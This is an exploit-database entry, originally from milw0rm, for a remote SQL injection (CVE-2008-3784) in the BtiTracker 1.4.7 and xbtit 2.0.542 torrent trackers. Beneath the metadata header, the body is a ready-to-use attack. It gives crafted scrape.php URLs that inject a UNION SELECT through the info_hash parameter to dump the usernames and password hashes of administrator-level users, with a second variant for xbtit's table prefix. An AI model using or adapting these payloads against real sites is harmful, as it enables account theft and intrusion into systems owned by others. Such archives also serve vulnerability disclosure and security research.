BtiTracker 1.4.7 / xbtit 2.0.542 - SQL Injection

Author: InATeam
type: webapps
platform: php
port: 
date_added: 2008-08-24  
date_updated: 2016-12-21  
verified: 1  
codes: OSVDB-47780;CVE-2008-3784  
tags:   
aliases:   
screenshot_url:   
application_url: http://www.exploit-db.combtitracker_147.zip  

raw file: 6296.txt  

## BtiTracker/xBtiTracker Remote SQL Injection Vulnerability
## Author: InATeam (http://inattack.ru/)
## Affected versions: BtiTracker <= 1.4.7, xBtiTracker <= 2.0.542
## Software site: http://www.btiteam.org/
##
## ==============================================================================
## Exploit:
## ==============================================================================
## http://site/scrape.php?info_hash=1%27)
## +UNION+SELECT+0,CONCAT(0x3C623E,username,0x3a,password,0x3C2F623E3C62723E),0,0
## +FROM+users+WHERE+id_level=8/*
## ==============================================================================
## for xBtiTracker we need to specify prefix:
## ==============================================================================
## http://site/scrape.php?info_hash=1%27)
## +UNION+SELECT+0,CONCAT(0x3C623E,username,0x3a,password,0x3C2F623E3C62723E),0,0
## +FROM+xbtit_users+WHERE+id_level=8/*
## ==============================================================================

# milw0rm.com [2008-08-25]